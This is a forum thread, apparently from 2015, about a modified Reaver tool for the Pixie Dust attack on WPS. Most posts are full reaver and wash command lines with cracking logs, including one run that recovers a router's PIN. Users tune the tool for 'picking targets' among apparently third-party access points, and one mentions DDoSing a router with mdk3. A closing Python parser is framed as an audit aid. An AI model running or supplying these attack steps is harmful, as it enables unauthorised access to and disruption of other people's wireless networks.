
Thread: Reaver modification for Pixie Dust Attack

  1. #11
    Senior Member
    Join Date
    Mar 2015
    Posts
    127
    No segmentation fault for me, however

    If no pin is found, OK, then it exits.
    Code:
    root@kali:~# reaver -i wlan3mon -b C4:.............. -vv -a -K3 -P
    
    Reaver v1.5.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com>
    mod by DataHead
    
    [+] p1_index set to 1
    [+] p2_index set to 0
    [+] Restored previous session
    [+] Waiting for beacon from C4:..............
    [+] Switching wlan3mon to channel 1
    [+] Switching wlan3mon to channel 2
    [+] Switching wlan3mon to channel 3
    [+] Switching wlan3mon to channel 4
    [+] Switching wlan3mon to channel 5
    [+] Switching wlan3mon to channel 6
    [+] Associated with C4:.............. (ESSID: TP-*********)
    [+] Starting Cracking Session. Pin count: 1, Max pin attempts: 11000
    [+] Trying pin 00005678.
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: dc:71:07:21:ab:fd:d2:8e:9a:63:b0:1c:e3:43:2f:6e
    [P] PKE: 7b:4b:4f:84:3c:94:ef:c9:64:39:c8:f6:43:3d:ce:24:8f:c7:5a:f1:c8:49:e4:b0:29:35:e0:d4:e9:10:ee:a4:85:c6:07:50:98:cf:49:18:a7:31:c3:85:2a:cd:ec:82:57:fd:f6:60:8c:78:18:2b:d4:39:95:04:d8:73:ac:43:60:d9:4d:06:ae:b9:0f:62:47:a6:f9:70:80:79:7d:45:3f:0a:00:fb:d0:44:f2:f7:5b:62:12:5d:7f:ce:4d:e4:5c:d3:47:10:9a:f7:5c:8b:46:a7:93:dc:04:4f:15:7e:e4:3a:77:20:b4:a4:45:a4:6b:9b:a5:61:c0:e9:c3:55:bc:e3:39:8e:82:df:24:1f:15:e7:f1:a9:86:6e:b7:7a:35:a5:26:5a:28:ef:0e:94:39:2c:18:ce:ca:3d:93:a5:b3:a5:80:f3:e7:33:13:ec:88:9c:60:69:b7:04:14:ca:d2:07:b1:7c:cf:67:43:72:0a:66:65:29:90:bf:59:94
    [P] WPS Manufacturer: TP-LINK
    [P] WPS Model Number: 1.0
    [+] Received M1 message
    [P] PKR: b9:de:9f:be:19:9a:92:78:4b:fc:b1:0f:dc:0d:5b:db:e6:b2:85:c6:96:1d:f1:93:66:59:06:53:7d:62:01:7d:bf:96:3c:8e:ed:c8:e6:08:f1:4a:48:c2:a5:f6:08:51:8e:1b:01:38:69:b0:d4:cd:d9:ef:1d:f0:4e:82:46:b3:cf:19:aa:1c:2e:e5:dc:4e:10:7c:71:c3:69:77:32:fe:2f:27:dc:d9:0e:20:2f:64:55:2d:58:d0:79:ee:dd:7d:70:04:13:62:3f:c3:39:c0:32:f5:83:3c:80:ba:b6:b6:37:9b:89:12:05:65:52:65:ac:e4:1f:fb:2c:31:aa:da:d4:f3:36:b1:04:2e:e0:a8:bd:4d:68:ca:13:98:2b:32:eb:81:ee:7c:e8:8d:ae:95:6e:06:08:4c:b2:f6:cc:26:c7:7a:7b:e3:03:f5:17:30:8a:c7:22:93:5c:79:d9:11:d0:73:8c:37:44:72:33:70:49:c6:ba:3d:0c:50:56:42
    [P] AuthKey: c9:6a:f4:8d:ea:95:40:09:31:59:15:ee:fd:8c:f4:84:2b:e7:6c:b1:89:8f:80:c8:a4:85:71:d4:57:e8:b5:75
    [+] Sending M2 message
    [P] E-Hash1: 32:2d:a3:b9:96:e3:a6:5e:92:ad:93:33:9a:08:00:d9:be:87:b8:a1:ee:9d:70:6f:c3:5d:2e:91:63:ab:d6:dc
    [P] E-Hash2: 55:95:0f:16:3c:33:bb:c8:31:2f:ff:f6:c3:45:09:ee:e3:ba:f9:d6:f9:15:c0:36:69:3b:1c:e2:9d:f8:cd:25
    [Pixie-Dust]  
    [Pixie-Dust]   [-] WPS pin not found!
    [Pixie-Dust]  
    [Pixie-Dust]   [*] Time taken: 0 s
    [Pixie-Dust]
    But if a pin is found, it hangs.
    Code:
    root@kali:~# reaver -i wlan3mon -b 8C:.......... -vv -a -K3 -P
    
    Reaver v1.5.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com>
    mod by DataHead
    
    [+] Waiting for beacon from 8C:..........
    [+] Switching wlan3mon to channel 1
    [+] Switching wlan3mon to channel 2
    [+] Switching wlan3mon to channel 3
    [+] Switching wlan3mon to channel 4
    [+] Switching wlan3mon to channel 5
    [+] Switching wlan3mon to channel 6
    [+] Switching wlan3mon to channel 7
    [+] Switching wlan3mon to channel 9
    [+] Associated with 8C:.......... (ESSID: TG167*****)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 2c:62:2f:3c:6f:e9:d4:75:92:a3:d3:e4:59:a0:92:bc
    [P] PKE: db:4c:8c:5d:1c:61:a0:b5:dd:4c:4b:6a:0a:59:02:c2:46:af:29:53:d4:14:77:9e:b4:0f:48:bc:95:40:6e:ed:e4:9a:08:46:29:78:a4:fe:6a:e2:45:65:73:cf:01:b1:4c:34:60:fa:87:30:7b:d2:6a:7a:fc:7d:7d:2f:8e:55:ab:43:e7:e9:87:31:2a:dc:08:e6:3e:2b:d3:80:93:ab:5c:c4:c5:93:07:6d:19:85:f1:39:56:55:6b:93:bb:ce:09:72:e6:b5:76:00:bb:ea:f7:04:ad:2d:71:83:2a:21:a5:dd:68:1f:dc:a4:88:6b:8c:8a:4d:39:a0:53:a1:3c:2c:c5:15:4c:15:03:db:f7:01:e6:fd:22:05:17:0d:86:07:44:c7:18:8c:9d:b7:fc:13:8a:0c:01:7b:38:c8:ca:05:99:e3:1f:4a:07:10:9b:19:b5:03:02:56:32:30:1a:57:b5:db:92:48:c1:f3:3e:45:e8:60:c4:ef:2e:87:79
    [P] WPS Manufacturer: Celeno Communication, Inc.
    [P] WPS Model Number: CL1800
    [+] Received M1 message
    [P] PKR: 04:10:d7:4d:a0:29:b4:8e:00:85:85:47:cd:bc:5f:84:da:c0:c8:4a:f2:36:8c:56:5c:00:28:a8:90:31:14:11:0e:24:d8:e2:fe:8f:58:db:8c:f1:28:f9:e3:81:f7:93:2a:2e:10:3c:f5:ec:55:ba:95:a0:87:73:c6:83:00:f2:1f:e0:00:80:6c:c9:1f:5c:76:6f:27:df:c9:25:21:58:e5:24:c8:26:80:67:d4:18:ab:68:79:bd:06:ac:b9:0b:7d:75:68:52:99:0c:c3:1c:30:1c:80:a1:c1:49:5a:29:b6:ac:98:b5:b6:c3:c4:fe:67:80:02:ae:9f:f7:ef:34:41:02:39:e5:f6:6b:ec:73:19:b5:be:75:ed:ed:ac:d6:e4:0c:68:7a:b8:a7:a6:fe:98:9e:7f:00:3a:78:b3:69:df:9c:13:fc:8f:50:58:01:31:5a:1b:8c:81:5d:47:99:1b:d9:0a:8b:b0:49:6f:9b:1a:af:25:31:c5:10:13:8c
    [P] AuthKey: eb:35:cb:40:af:86:fd:1d:8d:bb:2e:8b:82:f8:02:e5:3d:19:3b:9d:6a:2d:52:d2:97:49:dd:97:48:e6:41:db
    [+] Sending M2 message
    [P] E-Hash1: b9:76:ae:bd:db:d4:18:bc:2d:31:2f:24:02:d5:c4:a6:82:15:2e:00:da:de:98:dd:4e:a9:bd:fc:ee:b4:bc:cd
    [P] E-Hash2: a3:9b:6a:34:d8:39:7f:9e:07:21:68:b3:67:ed:82:42:08:61:e4:25:96:6d:4d:93:d6:ba:1f:38:aa:3f:09:0f
    [Pixie-Dust]  
    [Pixie-Dust]   [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust]   [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust]   [*] PSK1: b5:33:92:d2:5f:d2:d3:4a:ae:cb:81:db:c9:f6:63:a6
    [Pixie-Dust]   [*] PSK2: bb:f8:7f:74:54:1c:8b:74:e8:2a:3f:d3:c2:57:4e:36
    [Pixie-Dust]   [+] WPS pin: 50..........
    [Pixie-Dust]  
    [Pixie-Dust]   [*] Time taken: 0 s
    [Pixie-Dust]  
    Running the reaver with the correct pin, wait ...
    Cmd : reaver -i wlan3mon -b 8C:09:F4:.......:00 -c 9 -s y -p 50..........
    
    [Reaver Test] BSSID: 8C:09:00:11:00:11
    [Reaver Test] Channel: 9
    It hangs there.

  2. #12
    Member
    Join Date
    Apr 2015
    Posts
    39
    nuroo

    Try with a fixed channel. Reaver is trying to get the PSK, but if it is not able to complete the task it stays in this loop until it gets it; if the router is far away it is difficult for reaver to get up to the final stage.

    Better I put a timeout; tomorrow I will make the bug fix.


    And sorry for the credits hahaha

    It would be good if it already tried all the Ks; I'll think of something.

    Thank you again.
    Last edited by t6_x; 2015-04-15 at 09:05 AM.

  3. #13
    Member
    Join Date
    Apr 2015
    Posts
    39
    Option -g released in wash

    Code:
    -g, --get-chipset                    Output Piped and tries to read the chipset with reaver
    Example

    Code:
    # wash -i mon0 -g -c 2
    XX:XX:XX:XX:XX:XX| 1|-68|1.0|No |AAA| D-Link| DIR-615
    XX:XX:XX:XX:XX:XX| 1|-58|1.0|No |CCC| ASUSTeK Computer Inc.| RT-N56U

  4. #14
    Junior Member
    Join Date
    Nov 2014
    Posts
    7
    Quote Originally Posted by soxrok2212 View Post
    Another idea... have all the extra stuff print only with verbosity mode selected
    -v -vv -vvv maby?

    Quote Originally Posted by soxrok2212 View Post
    Update: I'm getting a segmentation fault when I use -K 1 and -K 3

    Code:
    Segmentation fault
    I also receive a segmentation fault error...

  5. #15
    Member
    Join Date
    Apr 2015
    Posts
    39
    Quote Originally Posted by SubZero5 View Post
    -v -vv -vvv maby?


    I also receive a segmentation fault error...
    Any router? Or some specific router?

  6. #16
    Senior Member
    Join Date
    Aug 2013
    Location
    lost in space
    Posts
    580
    Thx t6x!

    Quote Originally Posted by SubZero5 View Post
    -v -vv -vvv maby?
    Yesss. That. Keep different functions/improvements separated.

  7. #17
    Senior Member
    Join Date
    Mar 2015
    Posts
    127
    In my original reaver command, I did not specify a channel on purpose, to troubleshoot. But your code for reaver part 2 (passphrase) sets the channel automatically. NICE!
    [Pixie-Dust][*] PSK2: bb:f8:7f:74:54:1c:8b:74:e8:2a:3f:d3:c2:57:4e:36
    [Pixie-Dust] [+] WPS pin: 50..........
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]
    Running the reaver with the correct pin, wait ...
    Cmd : reaver -i wlan3mon -b 8C:09:F4:.......:00 -c 9 -s y -p 50..........

    [Reaver Test] BSSID: 8C:09:00:11:00:11
    [Reaver Test] Channel: 9

    I guess the AP is just too far away, like you said.

    The -g option in wash for the chipset is an excellent idea. Better for picking targets. Can't wait to try it later.
    Last edited by nuroo; 2015-04-15 at 09:35 PM.

  8. #18
    Junior Member
    Join Date
    Apr 2015
    Posts
    9
    Is this version of reaver compatible with WPS version 00? Because I tried this on a TP-LINK TD-W8961ND and it always gets stuck at M2 after getting the PKR, and WPS gets disabled; I have to DDoS the router with mdk3 to activate WPS again. [attachment: ScreenShot_20150414174436.jpg]

  9. #19
    Junior Member
    Join Date
    Apr 2015
    Posts
    9
    It's weird, I got the same PKR when I tried Reaver on the TP-LINK TD-W8961ND. The only problem is that Reaver always gets stuck at M2, so I didn't get the AuthKey, E-Hash1 and E-Hash2.

  10. #20
    Senior Member
    Join Date
    Mar 2015
    Posts
    127
    I love the -g option. Just tried it. This is a great idea.

    You're right, it does need a timer and/or an RSSI strength filter.

    Or maybe make each access point an independent process so wash can move on to the next AP, and maybe display something like "waiting......" until a response is received. (But I'm not a coder; maybe too much work.)

    00:00:00:00:B6:A0| 6|-48|1.0|No |We hear you walking upstairs| Cisco| 123456
    00:00:00:00:AD:00| 6|-47|1.0|No |TommyAndy4E| Waiting for Response..........
    00:00:00:00:37:56| 6|-56|1.0|No |100 Kane| Belkin International Inc.| RE6500
    00:00:00:00:8F:80| 6|-63|1.0|No |DG1670A82| Celeno Communication, Inc.| CL1800
    00:00:00:00:62:6C| 6|-50|1.0|No |Kirinyaga| NETGEAR, Inc.| Waiting for Response..........


    Also, does the -P option have no header on purpose, so it can fit in a small terminal window?
    Code:
    BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
    -------------------------------------------------------------------------------------------
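As an added example (not code from this thread, and not wash's or reaver's own), here is a parser for the pipe-delimited `wash -g` output shown in #13 and #20, written from an audit standpoint: it lists which of your own access points still answer WPS 1.0 unlocked so they can be fixed, and it handles the partially filled "Waiting for Response" rows from #20 as an edge case. The column order (BSSID, Channel, RSSI, WPS Version, WPS Locked, ESSID, Manufacturer, Model) is assumed from the rows posted in the thread, and the sample rows are constructed, not captured output.

```python
"""Parse the pipe-delimited output of `wash -g` and summarise WPS exposure.

Added example for this thread; not wash's or reaver's own code. Column order
is assumed from the rows quoted in the thread:
    BSSID | Channel | RSSI | WPS Version | WPS Locked | ESSID | Manufacturer | Model
Rows whose chipset lookup is still pending end in "Waiting for Response..."
and carry fewer columns; they are kept but flagged as incomplete.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample rows modelled on the output quoted in the thread
# (the "Yes" in the WPS Locked column is constructed to exercise that path).
SAMPLE_WASH_OUTPUT = """\
00:00:00:00:B6:A0| 6|-48|1.0|No |We hear you walking upstairs| Cisco| 123456
00:00:00:00:AD:00| 6|-47|1.0|No |TommyAndy4E| Waiting for Response..........
00:00:00:00:37:56| 6|-56|1.0|Yes|100 Kane| Belkin International Inc.| RE6500
00:00:00:00:8F:80| 6|-63|1.0|No |DG1670A82| Celeno Communication, Inc.| CL1800
00:00:00:00:62:6C| 6|-50|1.0|No |Kirinyaga| NETGEAR, Inc.| Waiting for Response..........
this line is garbage and must be skipped
"""

PENDING_MARKER = "Waiting for Response"


@dataclass
class WashRecord:
    bssid: str
    channel: int
    rssi: int
    wps_version: str
    wps_locked: bool
    essid: str
    manufacturer: Optional[str]  # None while the chipset lookup is pending
    model: Optional[str]         # None while the chipset lookup is pending
    chipset_pending: bool


def parse_wash_line(line: str) -> Optional[WashRecord]:
    """Parse one wash -g row; return None for lines that are not wash records."""
    fields = [f.strip() for f in line.split("|")]
    if len(fields) < 6:
        return None
    try:
        channel = int(fields[1])
        rssi = int(fields[2])
    except ValueError:
        return None
    bssid, wps_version, locked, essid = fields[0], fields[3], fields[4], fields[5]
    if bssid.count(":") != 5:
        return None
    # Trailing columns: manufacturer and model, either of which may be replaced
    # by the "Waiting for Response" marker when the lookup has not finished.
    tail = fields[6:]
    pending = any(t.startswith(PENDING_MARKER) for t in tail)
    tail = [t for t in tail if not t.startswith(PENDING_MARKER)]
    manufacturer = tail[0] if len(tail) >= 1 else None
    model = tail[1] if len(tail) >= 2 else None
    return WashRecord(bssid, channel, rssi, wps_version,
                      locked.lower() == "yes", essid, manufacturer, model, pending)


def parse_wash_output(text: str) -> List[WashRecord]:
    """Parse a whole wash -g capture, silently dropping non-record lines."""
    return [rec for rec in map(parse_wash_line, text.splitlines()) if rec is not None]


def wps_exposure_report(records: List[WashRecord]) -> Dict[str, List[str]]:
    """Group BSSIDs into: still unlocked on WPS 1.0 (remediate by disabling WPS),
    already locked, and those whose chipset lookup never returned."""
    report: Dict[str, List[str]] = {"unlocked_wps10": [], "locked": [], "chipset_pending": []}
    for r in records:
        if r.chipset_pending:
            report["chipset_pending"].append(r.bssid)
        if r.wps_locked:
            report["locked"].append(r.bssid)
        elif r.wps_version == "1.0":
            report["unlocked_wps10"].append(r.bssid)
    return report


if __name__ == "__main__":
    recs = parse_wash_output(SAMPLE_WASH_OUTPUT)
    for key, bssids in wps_exposure_report(recs).items():
        print(f"{key}: {bssids}")
```

Piping a real capture in (`wash -i mon0 -g -c 2 > capture.txt`, then `parse_wash_output(open("capture.txt").read())`) gives the same report for your own estate; anything in `unlocked_wps10` is an AP where WPS should be turned off, and anything in `chipset_pending` is a row the timer/RSSI filter discussed in #20 would have to account for.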
